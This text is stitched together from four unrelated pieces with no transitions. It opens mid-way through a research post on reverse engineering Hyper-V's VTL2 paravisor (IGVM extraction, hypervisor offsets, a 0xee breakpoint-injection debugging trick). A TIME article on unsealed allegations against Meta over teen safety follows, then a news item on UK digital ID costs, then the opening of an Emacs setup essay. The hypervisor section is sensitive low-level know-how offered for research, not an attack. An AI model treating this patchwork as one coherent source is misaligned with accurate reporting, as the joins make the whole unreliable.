And in Device Manager inside the VM, evidence of an active vTPM was present:
As shown, the vTPM MMIO address starting at
0xfed40000
appeared, and the device was working normally.
So the question arose: If vTPM is enabled and functional, then Hyper-V must have some executable or code providing this virtual TPM device. Based on prior Hyper-V research, we know that VMSP contains binaries to support vTPM, with a VMSP process launched at VM startup. But for
Trusted Launch
VMs, this doesn’t happen. There must be another binary (or set of binaries) providing equivalent functionality. The challenge: find where they are, when they load, and under what privileges they serve the VM.
Normally, user-mode virtual devices are initialized through the VMWP process. But in
Trusted Launch
VMs, devices communicating via IO/MMIO virtualization—such as vTPM or power management devices—are not initialized. Let’s take the
PowerManagementDevice
as an example:
Analysis shows: if HCL is enabled, or if
v36
is false, the function returns success to VMWP without actually initializing the device.
Debugging confirmed this: when initializing a
Trusted Launch
VM, calling
vmwp!SecurityManager::IsHclEnabled
returns true (
v35 = 1
). Thus, device initialization code (like vTPM) is never executed by VMWP.
That explains why VMSP never appears. But then, what provides the vTPM functionality? It seems a hidden “ghost” virtual device is quietly serving the VM.
At this point, research hit a roadblock. We knew the effect, but not the cause. Perhaps the
IsHclEnabled
function is the key.
3. OPENHCL and IGVM
Searching for Hyper-V, HCL, and VTL2 led directly to a Microsoft blog: (
OpenHCL: the new, open source paravisor
). This article introduces OPENHCL’s functionality and architecture, including the architecture diagram below:
This diagram clarifies where VTL2 resides and its role. VTL2 runs inside the VM, unlike VTL1, which runs on the Host. For the VM, VTL2 looks like a shadow system running on virtual hardware, resembling a mini-hypervisor—but not nested virtualization. We’ll explore this further later. Importantly, the VM cannot perceive VTL2, and even if VTL1 (securekernel) is fully compromised, it cannot access or modify VTL2 data.
The diagram also shows VTL2 (OPENHCL) having both user mode and kernel mode. In reality, Microsoft’s closed-source VTL2 integrates these into one large kernel binary, similar to securekernel.
Take vTPM as an example: previously, device binaries were loaded by VMWP/VMSP. Now, they are moved into VTL2. Since VTL2 is transparent to the VM, the VM sees no difference between traditional and
Trusted Launch
virtualization. But on the Host side,
Trusted Launch
requires no Host processes to support vTPM.
For example, years ago, I found multiple vTPM vulnerabilities. Suppose one allowed remote code execution. In traditional virtualization, attackers could exploit it to compromise the Host’s VMSP process. With
Trusted Launch
, exploitation only executes code in VTL2—inside the VM boundary. This reduces the attack surface for VM escapes. At worst, it breaks isolation from VTL0 → VTL2, not VM → Host.
Additionally, for confidential computing scenarios (like TPM), VTL2’s isolation guarantees stronger data protection. The VM doesn’t know what it’s communicating with, and even with Ring0 access, it cannot reach VTL2’s physical memory.
OPENVMM, an open-source project, is invaluable for understanding VTL2. But how is VTL2 implemented in real Windows systems?
Through debugging, I identified a key binary:
vmfirmwarehcl.dll
.
As its name suggests, this DLL is tied to Windows’ VTL2 implementation. Opening it in IDA showed no code—it appeared to be a resource container. Checking its resources confirmed this:
Inside was a resource named
VMFW
, whose magic number was
IGVM
. This points us to the
Independent Guest Virtual Machine (IGVM)
file format. IGVM files package everything needed to boot a VM across different stacks, supporting isolation tech like AMD SEV-SNP and Intel TDX. Conceptually, an IGVM is a command set that a loader interprets to build the VM’s initial state.
In Windows VTL2, the IGVM loader extracts and processes the IGVM inside vmfirmwarehcl.dll, writes required data and binaries into the VM’s physical memory, and finalizes the startup.
Microsoft’s open-source(
IGVM
)documents the format, and includes tools to dump IGVMs for analysis.
Parsing vmfirmwarehcl.dll revealed five IGVMs. Their
IGVM_VHT_SUPPORTED_PLATFORM
fields included:
So, for the IGVM file at the VTL2 level, the
HighestVtl
field should be set to 2, and the
PlatformType
field should be
VSM_ISOLATION
. In this way, the file
13510
is identified.
Inside the
13510
IGVM file, there is a complete PE file:
IGVM_VHT_PAGE_DATA:
GPA: 0000000001A00000
CompatibilityMask: 00000001
FileOffset: 00000000
Flags: 00000000
Reserved: 00000000
Got 4096 bytes of file data:
| 00000000 | 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 | MZ......................@....... |
| 00000020 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00 | ................................ |
| 00000040 | 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F | ........!..L.!This program canno |
| 00000060 | 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 | t be run in DOS mode....$....... |
| 00000080 | 4E 5F 00 FF 0A 3E 6E AC 0A 3E 6E AC 0A 3E 6E AC EE 4E 6D AD 09 3E 6E AC 78 BF 6D AD 0C 3E 6E AC | N_...>n..>n..>n..Nm..>n.x.m..>n. |
| 000000A0 | 7E BF 6A AD 0E 3E 6E AC 7E BF 6B AD 0B 3E 6E AC 7E BF 6D AD 05 3E 6E AC 7E BF 66 AD CB 3F 6E AC | ~.j..>n.~.k..>n.~.m..>n.~.f..?n. |
| 000000C0 | 7E BF 6E AD 0B 3E 6E AC 7E BF 91 AC 0B 3E 6E AC 7E BF 6C AD 0B 3E 6E AC 52 69 63 68 0A 3E 6E AC | ~.n..>n.~....>n.~.l..>n.Rich.>n. |
| 000000E0 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0C 00 67 E9 2F A8 00 00 00 00 | ................PE..d...g./..... |
| 00000100 | 00 00 00 00 F0 00 22 00 0B 02 0E 26 00 40 0D 00 00 10 0F 00 00 10 00 00 E0 4C 0C 00 00 10 00 00 | ......"....&.@...........L...... |
| 00000120 | 00 00 00 00 00 F8 FF FF 00 10 00 00 00 10 00 00 0A 00 00 00 0A 00 00 00 0A 00 00 00 00 00 00 00 | ................................ |
| 00000140 | 00 70 1C 00 00 10 00 00 0A 7D 13 00 01 00 60 41 00 00 08 00 00 00 00 00 00 20 00 00 00 00 00 00 | .p.......}....`A......... ...... |
| 00000160 | 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 10 04 11 00 8E 0C 00 00 | ................................ |
| 00000180 | 00 00 00 00 00 00 00 00 00 40 1C 00 F8 03 00 00 00 30 1B 00 DC 8F 00 00 00 00 00 00 00 00 00 00 | .........@.......0.............. |
...Data omitted...
From the dumped information, we can see that the following PE file is written into the Guest’s physical memory, starting at the Guest physical memory address
0x1A00000
. In fact, this PE file is the implementation of the VTL2 layer, which gets written into the virtual machine’s physical memory during the VM initialization stage.
By extracting this PE file from the
13510
IGVM file, we obtain the following executable file:
vmhcl.exe
vmhcl.exe
is the implementation of the VTL2 layer on the Windows platform. Moreover, Microsoft provides PDB downloads for
vmhcl.exe
, which reduces the complexity of reverse engineering. Functionally,
vmhcl.exe
is somewhat similar to
securekernel.exe
, as both provide functionality for higher VTL layers. The difference is that
securekernel.exe
serves the VTL1 layer, while
vmhcl.exe
serves the VTL2 layer.
4. VTL2 Architecture and Technical Details
Since it is VTL, everything inevitably revolves around the term virtualization. And once virtualization is mentioned, the starting point always goes back to the Windows Hypervisor layer.
The hypervisor version used in this article is:
10.0.26100.4652
The process of reverse engineering the hypervisor is omitted here. For the current version of the hypervisor, several key member offsets are as follows:
gs:360h ---- partition object
gs:360h + 0x1B0 : partition privilege
gs:360h + 0x1D0 : max vCPU amount
gs:360h + 0x1D4 : max vCPU index
gs:360h + 0x1E0 : virtual processor index 0
gs:360h + 0x1E8 : virtual processor index 1
...
virtual process + 0x148 : VTL0
virtual process + 0x150 : VTL1
virtual process + 0x158 : VTL2
VTL + 0x13E8 : VTL State
VTL State + 0x180 : VMCA VA
VTL State + 0x188 : VMCA PA
Next, we use debugging to observe the behavior of the virtual machine during the transition from VTL0 to VTL2, in order to better understand the practical purpose of the VTL2 level. First, the initial problem to solve is how to trigger code in VTL2 from within the virtual machine. It is known that the vTPM runs at the VTL2 level in
Trusted Launch
type virtual machines, so theoretically, performing TPM-related operations inside the VM should trigger the processing code at the VTL2 level.
Therefore, in theory, running the
Get-Tpm
command inside the virtual machine can be used to trigger code in VTL2.
Once we know how to trigger code in VTL2, the next step is to determine where the hypervisor performs the VTL level switch—specifically, the switch from VTL0 to VTL2. By setting breakpoints during the VTL switch, we can observe the memory state at different VTL levels.
After some work, we identified the function responsible for switching VTLs through reverse engineering:
sub_FFFFF800002B0370 proc near
mov [rsp+arg_8], rbx
mov [rsp+arg_10], rbp
mov [rsp+arg_18], rsi
push rdi
sub rsp, 20h
movzx eax, r8b
mov rbx, rdx
mov rsi, rcx
mov rbp, [rdx+rax*8+148h] ;The rax is the VTL Layer number
mov [rdx+404h], r8b
dec r8b
mov [rdx+3C0h], rbp
cmp r8b, 1
ja short loc_FFFFF800002B03B1
xor al, al
jmp short loc_FFFFF800002B03B7
loc_FFFFF800002B03B1:
mov al, [rdx+0DC0h]
loc_FFFFF800002B03B7:
mov [rdx+406h], al
lea rdi, [rbp+13C0h]
mov [rdx+1010h], rdi
mov rdx, rdi
call sub_FFFFF8000021C8D0 ;Finally, switch VTL level by this function
...Code Omitted...
You can use a conditional breakpoint here to pause execution when the VTL level number is 2:
From the above debugging process, it can be observed that when the virtual machine kernel code executes up to
tpm!TpmTransportCommandResponse::CheckRequestPttLocalityZero+0xf
, since the address to be read is an MMIO address mapped via map, this triggers a
VM-Exit
and control is handed over to the hypervisor for handling.
Subsequently, the hypervisor performs a VTL switch. That is, in the debugging process above, at
vmptrld qword ptr [rcx+188h]
, VTL0 is switched to VTL2. After switching to VTL2, by reading the VMCS fields, it is found that the RSP register value of VTL2 at this point is
0x1000023efb8
. Here, the RSP points to the top of the stack of the thread currently running the VP in VTL2, and this location holds the function’s return address.
After a series of address translations, the VTL2 address
0x1000023efb8
is converted to the physical address in the Host:
0x294cd5dfb8
. After reading it with a debugger, the return address is found to be:
0xfffff800000c504f
.
Opening vmhcl.exe in IDA, let’s examine the contents at
0xfffff800000c504f
:
Judging from the function name, it is essentially the main loop function of the VTL2 kernel thread. When the VTL switches to VTL2, the code in VTL2 starts executing from the instruction immediately after
DmVtlReturnAddress
, handling VTL0-level requests to read from MMIO addresses.
According to the information in the IGVM file, the
vmhcl.exe
file will be written into the Guest physical memory at
0x1a00000
. This GPA location is fixed, and the base address of the virtual address mapped in VTL2 is
0xFFFFF80000000000
. The debugging process also confirms this.
To summarize, the architecture of VTL2 is as follows.
5. Debugging Process
Through reverse engineering of
vmhcl.exe
, it was found that
vmhcl.exe
provides a debug functionality. By modifying the debug parameters, one can choose to use serial or network debugging. In theory, it is possible to debug
vmhcl.exe
in a manner similar to debugging the Windows kernel.
However, although
vmhcl.exe
provides full debugging capabilities from Microsoft, after investigation, modifying the debug parameters for serial or network debugging cannot successfully enable debugging for
vmhcl.exe
. This is because enabling
vmhcl.exe
debugging requires support from certain hypervisor parameters that ordinary users cannot access through standard methods, and Microsoft has not released official documentation for
vmhcl.exe
/
VTL2
. It seems that using the debugging functionality within
vmhcl.exe
to debug VTL2 is not currently feasible.
So, besides using a hardware debugger or an IDA + VMware dual-machine debugging setup to debug
vmhcl.exe
, are there any other approaches to easily debug
vmhcl.exe
?
Here, the
0xee
injection debugging method will be introduced. Although this method cannot achieve single-step tracing like dual-machine debugging, it is still possible to set breakpoints in
vmhcl.exe
and inspect memory and register states.
First, the principle behind
0xee
injection needs to be explained:
As is well known, a debugger sets a breakpoint at a specific location by inserting
0xcc
into the target position. When the program executes the
0xcc
and is intercepted by the debugger, the debugger restores the original instruction at that location. At this point, the breakpoint is triggered, waiting for user input.
Although it is not possible to insert
0xcc
into VTL2 to implement breakpoints, this idea of inserting a breakpoint can still be borrowed. Two issues need to be solved:
Find an instruction as short as possible (to facilitate restoring after the breakpoint is triggered) that can trigger a
VM-Exit
event, pausing the virtual machine and letting the hypervisor handle it.
Be able to locate this triggered event within the hypervisor.
After searching, one instruction that meets these two conditions is
0xee
.
In x64 assembly,
0xee
means:
out dx, al
, which writes the data from the
al
register to the port stored in the
dx
register. Performing I/O port read/write operations in a virtual machine directly triggers a
VM-Exit
event, pausing the VM and trapping into the hypervisor for handling. This is ideal because the Windows platform allows debugging of the hypervisor. Moreover, the data written via the
al
register can be set as a magic number, such as
0xdead
, making it convenient to locate this event during hypervisor debugging.
Thus, the complete breakpoint instruction is:
0: 66 b8 ad de mov ax,0xdead
4: ee out dx,al
Although it looks quite bloated, at least as a temporary debugging solution, it is still acceptable.
Next, we will use this method to debug the VTL2 layer’s
vmhcl.exe
as a test. A breakpoint will be set at the
vmhcl!VTpmExecuteCommand
function to examine the stack trace of the VTL2 context.
First, we need to locate the Host physical address of the
vmhcl!VTpmExecuteCommand
function. According to the disassembly of
vmhcl!VTpmExecuteCommand
, the virtual address of the function is
0xFFFFF8000008200C
. As mentioned in the previous section,
vmhcl.exe
is mapped to the Guest physical address starting at
0x1a00000
. Therefore, the physical address of the
vmhcl!VTpmExecuteCommand
function in the Guest is
0x1a8200c
.
After debugging, the physical address of the
vmhcl!VTpmExecuteCommand
function in the Host is:
0x150648200c
. Later, we will insert a breakpoint instruction at this physical address.
However, before inserting the breakpoint instruction, we need to set a conditional breakpoint at the hypervisor function that handles the
out dx, al
instruction, as follows:
bp hv+2C3D78".if(@dx==0xdead) {} .else {g;}"
//hv+2C3D78 is the hypervisor function used to handle the out dx, al instruction. Its second parameter, dx, corresponds to the value in the AL register in the virtual machine.
Next, we insert the breakpoint instruction at the beginning of the
vmhcl!VTpmExecuteCommand
function:
!ed 150648200c 0xdeadb866;!eb 150648200c+4 0xee
Now you can run the
Get-Tpm
command in the virtual machine to trigger VTL2 to execute the
vmhcl!VTpmExecuteCommand
function, and the breakpoint will be successfully hit.
Finally, set the Guest RIP back to the start of the
vmhcl!VTpmExecuteCommand
function so that the hypervisor can continue running and the debugging session ends.
6. Summary
During the initial VTL2 research phase, based on the description in Microsoft’s VSM documentation, either VTL1 cannot access VTL2’s data, or it cannot modify it. This initially led to the assumption that the VTL2 layer has higher privileges than VTL1. The VTL1 model was mapped to securekernel.exe in the host, while the VTL2 model was mapped to vmhcl.exe in the virtual machine. This assumption misled me into thinking that VTL2 in the virtual machine has higher privileges than VTL1 in the host. However, in reality, the VTL2 layer is never implemented in the host, making such a comparison meaningless.
In fact, the purpose of VTL2 is to isolate virtual devices, such as vTPM, running in the virtual machine environment. It ensures that while virtual devices operate within the VM, the VM’s operating system cannot modify or access sensitive data. This reduces the host’s attack surface while maintaining a trusted computing environment within the VM. Therefore, assuming a Windows-based VM, the privilege hierarchy within the virtual machine environment is:
VTL2 (vmhcl.exe) > VTL1 (securekernel.exe in the VM) > VTL0 (ntoskrnl.exe in the VM).
Debugging VTL2 feels like “dancing with shackles”—perhaps we can only hope that Microsoft will eventually release VTL2 documentation to the public. Nevertheless, for those researching Windows virtualization, this still serves as a temporary solution.
Sex trafficking on Meta platforms was both difficult to report and widely tolerated, according to a court filing unsealed Friday. In a plaintiffs’ brief filed as part of a major lawsuit against four social media companies, Instagram’s former head of safety and well-being Vaishnavi Jayakumar testified that when she joined Meta in 2020 she was shocked to learn that the company had a “17x” strike policy for accounts that reportedly engaged in the “trafficking of humans for sex.”
“You could incur 16 violations for prostitution and sexual solicitation, and upon the 17th violation, your account would be suspended,” Jayakumar reportedly testified, adding that “by any measure across the industry, [it was] a very, very high strike threshold.” The plaintiffs claim that this testimony is corroborated by internal company documentation.
The brief, filed by plaintiffs in the Northern District of California, alleges that Meta was aware of serious harms on its platform and engaged in a broad pattern of deceit to downplay risks to young users. According to the brief, Meta was aware that millions of adult strangers were contacting minors on its sites; that its products exacerbated mental health issues in teens; and that content related to eating disorders, suicide, and child sexual abuse was frequently detected, yet rarely removed. According to the brief, the company failed to disclose these harms to the public or to Congress, and refused to implement safety fixes that could have protected young users.
“Meta has designed social media products and platforms that it is aware are addictive to kids, and they’re aware that those addictions lead to a whole host of serious mental health issues,” says Previn Warren, the co-lead attorney for the plaintiffs in the case. “Like tobacco, this is a situation where there are dangerous products that were marketed to kids,” Warren adds. “They did it anyway, because more usage meant more profits for the company.”
The following allegations against Meta come from the brief filed in an unprecedented multidistrict litigation. More than 1,800 plaintiffs—including children and parents, school districts, and state attorneys general—have joined together in a suit alleging that the parent companies behind Instagram, TikTok, Snapchat, and YouTube “relentlessly pursued a strategy of growth at all costs, recklessly ignoring the impact of their products on children’s mental and physical health,” according to their master complaint. The newly unsealed allegations about Meta are just one small part of the sprawling suit. (TIME filed a motion to intervene in the case to ensure public access to court records; the motion was denied.)
The plaintiffs’ brief, first reported by TIME, purports to be based on sworn depositions of current and former Meta executives, internal communications, and company research and presentations obtained during the lawsuit’s discovery process. It includes quotes and excerpts from thousands of pages of testimony and internal company documents. TIME was not able to independently view the underlying testimony or research quoted in the brief, since those documents remain under seal.
But the brief still paints a damning picture of the company’s internal research and deliberations about issues that have long plagued its platforms. Plaintiffs claim that since 2017, Meta has aggressively pursued young users, even as its internal research suggested its social media products could be addictive and dangerous to kids. Meta employees proposed multiple ways to mitigate these harms, according to the brief, but were repeatedly blocked by executives who feared that new safety features would hamper teen engagement or user growth.
“We strongly disagree with these allegations, which rely on cherry-picked quotes and misinformed opinions in an attempt to present a deliberately misleading picture," a Meta spokesperson said in a statement to TIME. "The full record will show that for over a decade, we have listened to parents, researched issues that matter most, and made real changes to protect teens – like introducing Teen Accounts with built-in protections and providing parents with controls to manage their teens’ experiences. We’re proud of the progress we’ve made and we stand by our record.”
In the years since the lawsuit was filed, Meta has implemented new safety features designed to address some of the problems described by plaintiffs. In 2024, Meta unveiled Instagram Teen Accounts, which defaults any user between 13 and 18 into an account that is automatically private, limits sensitive content, turns off notifications at night, and doesn’t allow messaging from unconnected adults. “We know parents are worried about their teens having unsafe or inappropriate experiences online, and that’s why we’ve significantly reimagined the Instagram experience for tens of millions of teens with new Teen Accounts,” a Meta spokeswoman told TIME in June. “These accounts provide teens with built-in protections to automatically limit who’s contacting them and the content they’re seeing, and teens under 16 need a parent’s permission to change those settings. We also give parents oversight over their teens’ use of Instagram, with ways to see who their teens are chatting with and block them from using the app for more than 15 minutes a day, or for certain periods of time, like during school or at night.”
And yet the plaintiffs’ brief suggests that Meta resisted safety changes like these for years.
The brief quotes testimony from Brian Boland, Meta’s former vice president of partnerships who worked at the company for 11 years and resigned in 2020. “My feeling then and my feeling now is that they don’t meaningfully care about user safety,” he allegedly said. “It’s not something that they spend a lot of time on. It’s not something they think about. And I really think they don’t care.”
After the plaintiffs’ brief was unsealed late Friday night, Meta did not immediately respond to TIME’s requests for comment.
Here are some of the most notable allegations from the plaintiffs’ omnibus brief:
Allegation: Meta had a high threshold for "sex trafficking" content—and no way to report child sexual content
Despite Instagram’s “zero tolerance” policy for child sexual abuse material, the platform did not offer users a simple way to report child sexual abuse content, according to the brief. Plaintiffs allege that Jayakumar raised the issue multiple times when she joined Meta in 2020, but was told it would be too difficult to address. Yet Instagram allowed users to easily report far less serious violations, like “spam,” “intellectual property violation” and “promotion of firearms,” according to plaintiffs.
Jayakumar was even more shocked to learn that Instagram had a disturbingly high tolerance for sex trafficking on the platform. According to the brief, she testified that Meta had a “17x” strike policy for accounts that reportedly engaged in the “trafficking of humans for sex,” meaning it would take at least 16 reports for an account to be deleted.
“Meta never told parents, the public, or the Districts that it doesn’t delete accounts that have engaged over fifteen times in sex trafficking,” the plaintiffs wrote.
A Meta spokesperson disputed this allegation to TIME, saying the company has for years removed accounts immediately if it suspects them of human trafficking or exploitation and has made it easier over time for users to report content that violates child-exploitation policies.
Allegation: Meta "lied to Congress" about its knowledge of harms on the platform
For years, plaintiffs allege, Meta’s internal research had found that teenagers who frequently use Instagram and Facebook have higher rates of anxiety and depression.
In late 2019, according to the brief, Meta designed a “deactivation study,” which found that users who stopped using Facebook and Instagram for a week showed lower rates of anxiety, depression, and loneliness. Meta halted the study and did not publicly disclose the results, stating that the research study was biased by the “existing media narratives around the company.” (A Meta spokesperson told TIME that the study was initially conceived as a pair of one-weeks pilots, and researchers declined to continue it because it found that the only reductions in feelings of depression, anxiety, and loneliness were among people who already believed Facebook was bad for them.)
At least one Meta employee was uncomfortable with the implications of this decision: “If the results are bad and we don’t publish and they leak,” this employee wrote, according to the brief, “is it going to look like tobacco companies doing research and knowing cigs were bad and then keeping that info to themselves?”
Indeed, in December 2020, when the Senate Judiciary Committee asked the company in a set of written questions whether it was “able to determine whether increased use of its platform among teenage girls has any correlation with increased signs of depression” and “increased signs of anxiety,” the company offered only a one-word answer: “No.”
To the plaintiffs in the case, the implication is clear: “The company never publicly disclosed the results of its deactivation study. Instead, Meta lied to Congress about what it knew.”
Allegation: The company knew Instagram was letting adult strangers connect with teenagers
For years
Instagram has had
a well-documented problem of adults harassing teens. Around 2019, company researchers recommended making all teen accounts private by default in order to prevent adult strangers from connecting with kids, according to the plaintiffs’ brief. Instead of implementing this recommendation, Meta asked its growth team to study the potential impact of making all teen accounts private. The growth team was pessimistic, according to the brief, and responded that the change would likely reduce engagement.
By 2020, the growth team had determined that a private-by-default setting would result in a loss of 1.5 million monthly active teens a year on Instagram. The plaintiffs’ brief quotes an unnamed employee as saying: “taking away unwanted interactions… is likely to lead to a potentially untenable problem with engagement and growth.” Over the next several months, plaintiffs allege, Meta’s policy, legal, communications, privacy, and well-being teams all recommended making teen accounts private by default, arguing that the switch “will increase teen safety” and was in line with expectations from users, parents, and regulators. But Meta did not launch the feature that year.
Safety researchers were dismayed, according to excerpts of an internal conversation quoted in the filing. One allegedly grumbled: “Isn’t safety the whole point of this team?”
“Meta knew that placing teens into a default-private setting would have eliminated 5.4 million unwanted interactions a day,” the plaintiffs wrote. Still, Meta didn’t make the fix. Instead, inappropriate interactions between adults and kids on Instagram skyrocketed to 38 times that on Facebook Messenger, according to the brief. The launch of Instagram Reels allegedly compounded the problem. It allowed young teenagers to broadcast short videos to a wide audience, including adult strangers.
An internal 2022 audit allegedly found that Instagram’s Accounts You May Follow feature recommended 1.4 million potentially inappropriate adults to teenage users in a single day. By 2023, according to the plaintiffs, Meta knew that they were recommending minors to potentially suspicious adults and vice versa.
It wasn’t until 2024 that Meta rolled out default privacy settings to all teen accounts. In the four years it took the company to implement their own safety recommendations, teens experienced billions of unwanted interactions with strangers online. Inappropriate encounters between teens and adults were common enough, according to the brief, that the company had an acronym for them: “IIC,” or “inappropriate interactions with children.”
A Meta spokesperson said the company has defaulted teens under 16 to private accounts since 2021, began defaulting teens under 18 into private accounts with the introduction of its Teen Accounts program, and has
taken steps
to protect users from online predators.
Allegation: Meta aggressively targeted young users
Meta feared young users would abandon Facebook and Instagram for their competitors. Acquiring and keeping young users became a central business goal. Meta CEO Mark Zuckerberg suggested that “teen time spent be our top goal of 2017,” according to a company executive quoted in the brief. That has remained the case, plaintiffs allege; internal company documents from 2024 stated that “acquiring new teen users is mission critical to the success of Instagram.” (A Meta spokesperson said time spent on its platforms is not currently a company goal.)
Meta launched a campaign to connect with school districts and paid organizations like the National Parent Teacher Association and Scholastic to conduct outreach to schools and families. Meanwhile, according to the brief, Meta used location data to push notifications to students in “school blasts,” presumably as part of an attempt to increase youth engagement during the school day. As one employee allegedly put it: “One of the things we need to optimize for is sneaking a look at your phone under your desk in the middle of Chemistry :)”.
Though Meta aggressively pursued young users, it may not have known exactly how old those new users were. Whistleblower
Jason Sattizahn recently
testified to Congress that Meta does not reliably know the age of its users. (Meta pushed back on Sattizahn’s testimony,
saying in a statement to NBC
that his claims were “nonsense” and “based on selectively leaked internal documents that were picked specifically to craft a false narrative.”) In 2022, according to the plaintiffs’ brief, there were 216 million users on Meta platforms whose age was “unknown.”
Federal law requires social media platforms to observe various data-privacy safeguards for users under 13, and Meta policy states that users under 13 are not allowed on its platforms. Yet the plaintiffs’ court filing claims Meta knew that children under 13 used the company’s products anyway. Internal research cited in the brief suggested there were 4 million users under 13 on Instagram in 2015; by 2018, the plaintiffs claim, Meta knew that roughly 40% of children aged 9 to 12 said they used Instagram daily.
The plaintiffs allege that this was a deliberate business strategy. The brief describes a coordinated effort to acquire young users that included studying the psychology and digital behavior of “tweens” and exploring new products designed for “users as young as 5-10.”
Internally, some employees expressed disgust at the attempt to target preteens. “Oh good, we’re going after <13 year olds now?” one wrote, according to the brief. “Zuck has been talking about that for a while...targeting 11 year olds feels like tobacco companies a couple decades ago (and today). Like we’re seriously saying ‘we have to hook them young’ here.”
Allegation: Meta's executives initially shelved efforts to make Instagram less toxic for teens
To combat toxic “social comparison,” in 2019 Instagram CEO Adam Mosseri announced a new product feature that would “hide” likes on posts. Meta researchers had determined that hiding likes would make users “significantly less likely to feel worse about themselves,” according to the plaintiffs’ brief. The initiative was code-named Project Daisy.
But after a series of tests, Meta backtracked on Project Daisy. It determined the feature was “pretty negative to FB metrics,” including ad revenue, according to the plaintiffs’ brief, which quotes an unnamed employee on the growth team insisting: “It’s a social comparison app, fucking get used to it.”
A similar debate took place over the app’s beauty filters. Plaintiffs claim that an internal review concluded beauty filters exacerbated the “risk and maintenance of several mental health concerns, including body dissatisfaction, eating disorders, and body dysmorphic disorder,” and that Meta knew that “children are particularly vulnerable.” Meta banned beauty filters in 2019, only to roll them back out the following year after the company realized that banning beauty filters would have a “negative growth impact,” according to the plaintiffs’ brief.
Other company researchers allegedly built an AI “classifier” to identify content that would lead to negative appearance comparison, so that Meta could avoid recommending it to vulnerable kids. But Mosseri allegedly killed the project, disappointing developers who “felt like they had a solution” to “a big problem.”
Allegation: Meta doesn't automatically remove harmful content, including self-harm content
While Meta developed AI tools to monitor the platforms for harmful content, the company didn’t automatically delete that content even when it determined with “100% confidence” that it violated Meta’s policies against child sexual-abuse material or eating-disorder content. Meta’s AI classifiers did not automatically delete posts that glorified self-harm unless they were 94% certain they violated platform policy, according to the plaintiffs’ brief. As a result, most of that content remained on the platform, where teenage users often discovered it. In a 2021 internal company survey cited by plaintiffs, more than 8% of respondents aged 13 to 15 reported having seen someone harm themselves, or threaten to do so, on Instagram during the past week.
A Meta spokesperson said the company reports more child sexual-abuse material than any other service and uses an array of tools to proactively find that content, including photo and video-matching technologies as well as machine learning. The spokesperson said human reviewers assess content flagged before it is deleted to ensure it violates policies, prevent mistakes that could affect users, and maintain the integrity of the company's detection databases.
Allegation: Meta knew its products were addictive, but publicly downplayed the harms
The addictive nature of the company’s products wasn’t a secret internally. “Oh my gosh yall IG is a drug,” one of the company’s user-experience researchers allegedly wrote to a colleague. “We’re basically pushers.”
Meta does not officially study addiction to its products, plaintiffs allege; it studies “problematic use.” In 2018, company researchers surveyed 20,000 Facebook users in the U.S. and found that 58% had some level of “problematic use”—55% mild, and 3.1% severe. But when Meta published an account of this research the following year, only the smaller number of users with “severe” problematic use was mentioned. “We estimate (as an upper bound) that 3.1% of Facebook users in the U.S. experience problematic use,”
wrote the researchers
. The other 55% of users are not mentioned anywhere in the public report.
Plaintiffs allege that Meta’s safety team proposed features designed to lessen addiction, only to see them set aside or watered down. One employee who helped develop a “quiet mode” feature said it was shelved because Meta was concerned that this feature would negatively impact metrics related to growth and usage.
Around the same time, another user-experience researcher at Instagram allegedly recommended that Meta inform the public about its research findings: “Because our product exploits weaknesses in the human psychology to promote product engagement and time spent,” the researcher wrote, Meta needed to “alert people to the effect that the product has on their brain.”
Meta did not.
This story has been updated to reflect additional comments from Meta.
UK minister ducks cost questions on nationwide digital ID scheme
A UK tech minister has declined to put a figure on the cost of the government's digital ID plans as MPs question the contributions expected from central departments.
Speaking to a House of Commons select committee this week, minister for digital government and data Ian Murray defended the government's decision not to publish budgeted costs of its plans to build digital IDs for every citizen.
UK politicians to draft outage blueprint after AWS calamity
In September,
the government announced
plans to issue all legal residents a digital identity by August 2029, which in the first instance is set to be used to prove eligibility to work. Prime minister Keir Starmer said digital IDs were "an enormous opportunity for the UK." As well as making it tougher to work illegally, they would also "offer ordinary citizens countless benefits, like being able to prove your identity to access key services swiftly," he said.
The plan is to use smartphones to store digital IDs and build on existing work to introduce a government digital wallet including driving licenses.
Appearing before the Science, Innovation and Technology Committee this week, Murray said budgets for the project had yet to be determined, although the technical delivery will be managed by the Government Digital Service (GDS), within the Department for Science, Innovation and Technology (DSIT).
"In terms of the cost [it is to] be determined by what the system looks like, and that can only really be measured after the consultation has been closed and analyzed," he said.
Murray said those initial costs would come from the DSIT settlement in the spending review period, although other departments will be expected to contribute as use cases are produced.
"The cost of the entire system will depend on what the system looks like," he said. "Digital inclusion, all the bits that are attached to digital ID, and also the use cases from other government departments in terms of both the cost of having the system, the cost of running the system, and the savings that are subsequently made from having a much more efficient system."
Kit Malthouse, Conservative MP and committee member, questioned whether departments expected to contribute would be able to protect that funding.
"We may be in a position then where the home secretary says, 'Right, you're asking for £500 million for this thing that may yield savings. But you know what? That's £500 million. I'd have to take from policing or border security, so I don't want your service. Thanks very much. Go and look elsewhere.' The delivery of it will be down effectively to negotiation with departments," he said.
Murray responded that the digital ID scheme was "the prime ministerial priority, and therefore GDS, in terms of digital ID, will build the system under the monitoring and policy development of the Cabinet Office."
Meanwhile, the minister said his department had decided not to appoint another chief digital officer (CDO) to replace the outgoing Joanna Davinson, who was interim CDO from December 2024 to September 2025, a post she had
previously held
on a permanent basis. The responsibilities would now become part of the role of the permanent secretary, the most senior civil servant in the department.
"Keeping these issues at permanent secretary level is the way to get a cross-government approach to it," he said.
However, committee chair Chi Onwurah questioned whether the permanent secretary would necessarily have the experience of digital transformation needed for the CDO role.
When you write code, you want to focus on the code, not on the text
of the code. This means a) you have to have a good text editing setup,
and b) you need to have a muscle-memory level instinct for using that
setup. The second comes with practice and with
consistency
(i.e. not changing your config too much too quickly). The first is what
I will talk about here.
This document is meant for people who are current users of, or at
least slightly familiar with Emacs. I won’t spend much time explaining
Emacs basics - for example how incremental search, or compilation
buffers work (I would recommend
Mastering Emacs
for
that). But I will give rationales for the choices I’ve made in
